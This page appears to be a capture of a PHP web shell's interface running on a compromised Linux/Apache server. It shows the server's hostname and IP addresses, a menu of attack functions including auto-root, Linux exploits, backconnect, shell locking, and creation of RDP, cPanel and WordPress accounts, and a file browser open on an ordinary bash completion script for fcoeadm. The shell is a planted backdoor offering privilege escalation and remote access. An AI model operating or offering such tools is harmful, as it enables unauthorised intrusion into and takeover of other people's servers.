Linux server.flyproject.com.br 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64
Apache
: 207.244.227.86 | : 216.73.217.1
10 Domain
7.1.33
hubnog
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
bash_completion.d /
[ HOME SHELL ]
Name
Size
Permission
Action
bpftool
14.82
KB
-rw-r--r--
createrepo
4.35
KB
-rw-r--r--
fcoeadm
1.97
KB
-rw-r--r--
fcoemon
911
B
-rw-r--r--
genpkgmetadata.py
4.35
KB
-rw-r--r--
git
54.86
KB
-rw-r--r--
gluster
11.25
KB
-rwxr--r--
ipa
1001
B
-rwxr-xr-x
iprutils
829
B
-rw-r--r--
itweb-settings.bash
346
B
-rw-r--r--
javaws.bash
1011
B
-rw-r--r--
lldpad
1.07
KB
-rw-r--r--
lldptool
2.53
KB
-rw-r--r--
mergerepo
4.35
KB
-rw-r--r--
mergerepo.py
4.35
KB
-rw-r--r--
modifyrepo
4.35
KB
-rw-r--r--
modifyrepo.py
4.35
KB
-rw-r--r--
policyeditor.bash
332
B
-rw-r--r--
redefine_filedir
1.42
KB
-rw-r--r--
scl.bash
1.49
KB
-rw-r--r--
yum-utils.bash
11.01
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : fcoeadm
# bash completion for fcoeadm # ## fcoeadm --help #Version 1.0.17 #Usage: fcoeadm # [-m|--mode fabric|vn2vn] [-c|--create] <ethX> # [-d|--destroy] <ethX> # [-r|--reset] <ethX> # [-S|--Scan] <ethX> # [-i|--interface] [<ethX>] # [-t|--target] [<ethX>] # [-l|--lun] [<ethX>] # [-s|--stats] <ethX> [<interval>] # [-v|--version] # [-h|--help] # This file must be updated with any changes to, or additions to the options. # Could not get numeric value to work for the --stats interval # Considered parsing output of --help to complete options have fcoeadm && _available_fcoe_interfaces() { if [ "${1:-}" = -a ]; then # list only devices that are up COMPREPLY=( $( for f in /sys/class/net/* ; do if grep -q up $f/operstate ; then echo ${f##*/} ; fi ; done 2>/dev/null )) else # list all devices COMPREPLY=( $( for f in /sys/class/net/* ; do echo ${f##*/} ; done 2>/dev/null )) fi COMPREPLY=( $( compgen -W '${COMPREPLY[@]/%[[:punct:]]/}' -- "$cur" ) ) } have fcoeadm && _fcoeadm_options() { local cur prev prev_prev opts COMPREPLY=() cur="${COMP_WORDS[COMP_CWORD]}" prev="${COMP_WORDS[COMP_CWORD-1]}" opts="-m --mode -c --create -d --destroy -r --reset -i --interface -t --target -l --lun -s --stats -S --Scan -h --help -v --version" case "${prev}" in -c|--create|-d|--destroy|-r|--reset|-s|--stats|-S|--Scan|-i|--interface|-t|--target|-l|--lun) # only show interfaces that are up _available_fcoe_interfaces -a return 0 ;; -m|--mode) COMPREPLY=( fabric vn2vn ) COMPREPLY=( $( compgen -W '${COMPREPLY[@]/%[[:punct:]]/}' -- "$cur" ) ) return 0 ;; esac case "${cur}" in *) COMPREPLY=( $(compgen -W "${opts}" -- ${cur}) ) return 0 ;; esac return 0 } complete -F _fcoeadm_options fcoeadm # Local variables: # mode: shell-script # sh-basic-offset: 4 # sh-indent-comment: t # indent-tabs-mode: nil # End: # ex: ts=4 sw=4 et filetype=sh
Close